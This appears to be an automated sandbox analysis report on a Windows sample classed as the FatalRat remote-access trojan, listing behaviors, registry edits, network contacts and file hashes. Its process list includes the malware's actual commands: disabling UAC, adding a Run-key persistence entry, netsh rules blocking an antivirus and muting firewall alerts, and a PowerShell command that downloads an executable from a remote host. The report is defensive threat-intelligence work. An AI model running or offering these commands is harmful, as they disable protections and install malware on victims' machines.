Analysis Overview
SHA256
b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d
Threat Level: Known bad
The file 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk was found to be: Known bad.
Malicious Activity Summary
FatalRat
Fatalrat family
UAC bypass
Fatal Rat payload
Blocklisted process makes network request
Modifies Windows Firewall
Downloads MZ/PE file
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Adds Run key to start application
Drops desktop.ini file(s)
Command and Scripting Interpreter: PowerShell
Checks installed software on the system
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Modifies registry class
Checks processor information in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-02-23 12:47
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2025-02-23 12:47
Reported
2025-02-23 12:50
Platform
win10v2004-20250217-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
FatalRat
Fatalrat family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Fatal Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\programdata\20250223024745\Agghosts.exe | N/A |
| N/A | N/A | C:\Users\Public\Videos\bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\programdata\20250223024745\Agghosts.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" | C:\Windows\System32\reg.exe | N/A |
Checks installed software on the system
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\programdata\20250223024745\Agghosts.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\Videos\bin.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\programdata\20250223024745\Agghosts.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\programdata\20250223024745\Agghosts.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\URL Protocol | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\DefaultIcon | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\shell | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\shell\open | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\shell\open\command | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\shell\open\command | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\ = "URL:TonSite Link" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\shell\open | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\shell\open\command | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\ = "URL:Telegram Link" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\shell | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\URL Protocol | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\DefaultIcon | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\shell\open | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\DefaultIcon | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\shell\open | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\shell | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\DefaultIcon | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\shell | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\shell\open\command | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\programdata\20250223024745\Agghosts.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024745\1.bat" "
C:\programdata\20250223024745\Agghosts.exe
"C:\programdata\20250223024745\Agghosts.exe"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024745\fhq.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile settings inboundusernotification disable
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile settings inboundusernotification disable
C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile settings inboundusernotification disable
C:\Users\Public\Videos\bin.exe
"C:\Users\Public\Videos\bin.exe"
C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp" /SL5="$7023C,46193823,827904,C:\Users\Public\Videos\bin.exe"
C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
"C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | baba-1336130708.cos.ap-tokyo.myqcloud.com | udp |
| JP | 43.128.240.48:443 | baba-1336130708.cos.ap-tokyo.myqcloud.com | tcp |
| N/A | 127.0.0.1:49418 | tcp | |
| US | 8.8.8.8:53 | www.baidu.com | udp |
| HK | 103.235.46.96:80 | www.baidu.com | tcp |
| US | 8.8.8.8:53 | spoutry.it.com | udp |
| JP | 118.107.15.176:8081 | spoutry.it.com | tcp |
| JP | 43.128.240.48:443 | baba-1336130708.cos.ap-tokyo.myqcloud.com | tcp |
| NL | 149.154.167.51:443 | tcp | |
| NL | 95.161.76.100:443 | tcp | |
| NL | 149.154.167.51:80 | 149.154.167.51 | tcp |
| NL | 95.161.76.100:80 | 95.161.76.100 | tcp |
| US | 8.8.8.8:53 | td.telegram.org | udp |
| NL | 149.154.167.99:443 | td.telegram.org | tcp |
| NL | 149.154.167.92:443 | tcp | |
| NL | 149.154.167.41:443 | tcp | |
| NL | 149.154.167.41:80 | 149.154.167.41 | tcp |
| NL | 149.154.167.92:80 | 149.154.167.92 | tcp |
Files
memory/4888-11-0x0000000140000000-0x0000000140419000-memory.dmp
memory/4888-12-0x00000145A6830000-0x00000145A6C44000-memory.dmp
memory/4888-13-0x0000000140000000-0x0000000140419000-memory.dmp
memory/4888-14-0x00000145A6270000-0x00000145A6271000-memory.dmp
C:\ProgramData\20250223024745\Agghosts.exe
| MD5 | 2a24dcd41bc3c5b5f7eceda525786578 |
| SHA1 | 7e898f9ee5a97a1a261326f0168e8de44dcf8af4 |
| SHA256 | 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7 |
| SHA512 | aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a |
C:\Users\Public\Downloads\20250223024745\1.bat
| MD5 | fa42ebb1071abc0e618c296ea2cf71a6 |
| SHA1 | 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a |
| SHA256 | 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d |
| SHA512 | 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05 |
C:\ProgramData\lnk\2.lnk
| MD5 | b7eb81f993f4ceeb2da553567e098525 |
| SHA1 | 69ad5eca3d5dfce012dbb812cb91a5491d082bcd |
| SHA256 | 351a3f0aaaef00a71797e390cee3603283d7baac8d97fd1161245e82cded294b |
| SHA512 | 047d214720203198cc7efb49a1f4771b7f27c8e1a3459ac1440ef37720b927f1e74c27ac8bd7ce7370fea28bc5a84ba499ebc5479ceb4d848186c8da60c968cf |
C:\programdata\20250223024745\libcef.dll
| MD5 | b7f8c3416cdfd6f46c790da064f66099 |
| SHA1 | d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6 |
| SHA256 | b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d |
| SHA512 | 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7 |
C:\programdata\20250223024745\Ensup.log
| MD5 | 2fd94f6e1d71454d716a126f0d7450ac |
| SHA1 | 5d966df95c741880089e9078af921a22216516ec |
| SHA256 | a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5 |
| SHA512 | 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2 |
memory/1828-55-0x0000000001510000-0x0000000001539000-memory.dmp
memory/4888-67-0x0000000140000000-0x0000000140419000-memory.dmp
C:\Users\Public\Videos\download_and_run.bat
| MD5 | a90ccfd040d774b547f7d258b8e03661 |
| SHA1 | c46e353d34723f9393482974a516d51dfb52440d |
| SHA256 | d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2 |
| SHA512 | bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7 |
C:\Users\Public\Downloads\20250223024745\fhq.bat
| MD5 | 3a7cb580bd340505f6dc5b4c829a3eca |
| SHA1 | 21cc730517d74fa1d13316d7e0d817f3bd710906 |
| SHA256 | 1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2 |
| SHA512 | c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0qpalyu4.ec3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3640-79-0x0000017AD3730000-0x0000017AD3752000-memory.dmp
C:\Users\Public\Videos\bin.exe
| MD5 | 06eaa3263801f4d695c3727834ffbca5 |
| SHA1 | 58031db0039cf00a1fe738e55ee2fca35558c4fd |
| SHA256 | 97969d6e01ee37a16f4f7f64e6166f169bedfe95190f48d426693d4b95e8e8ff |
| SHA512 | 7b03899c6ce403172eb6d159e142b8ac25ef3aa6eb7f56abd205657d13832eb5b8ee61408b8d7a6f3f1c57de7fcc2565ce2ce9ecb4e54611f4c48098a870b6b3 |
memory/4188-87-0x0000000000EF0000-0x0000000000FC8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp
| MD5 | 2e90747fe82d7271fbe97ea022fd5173 |
| SHA1 | 6164bc0ec0c908e9159a0c5d558945d7974e11c1 |
| SHA256 | bbec6b26c13b8ebfd01789a8248c6a45646134daf1ef998dbb885ec59157e6b4 |
| SHA512 | d9a797861f8a7fc966a0a00e1719734a23c95c39aca9d70322d09274119267c8bd0d86a3ec468a7f493422769f89a48469f1e33a6a1dd2d39cb30cfb4df6fa44 |
memory/4188-93-0x0000000000EF0000-0x0000000000FC8000-memory.dmp
memory/3528-94-0x0000000000D20000-0x0000000001057000-memory.dmp
memory/3528-96-0x0000000000D20000-0x0000000001057000-memory.dmp
memory/3528-101-0x0000000000D20000-0x0000000001057000-memory.dmp
C:\Users\Admin\AppData\Roaming\Telegram Desktop\modules\x64\d3d\d3dcompiler_47.dll
| MD5 | a7349236212b0e5cec2978f2cfa49a1a |
| SHA1 | 5abb08949162fd1985b89ffad40aaf5fc769017e |
| SHA256 | a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082 |
| SHA512 | c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02 |
memory/3528-126-0x0000000000D20000-0x0000000001057000-memory.dmp
memory/4188-127-0x0000000000EF0000-0x0000000000FC8000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-23 12:47
Reported
2025-02-23 12:50
Platform
win7-20241023-en
Max time kernel
119s
Max time network
152s
Command Line
Signatures
FatalRat
Fatalrat family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Fatal Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
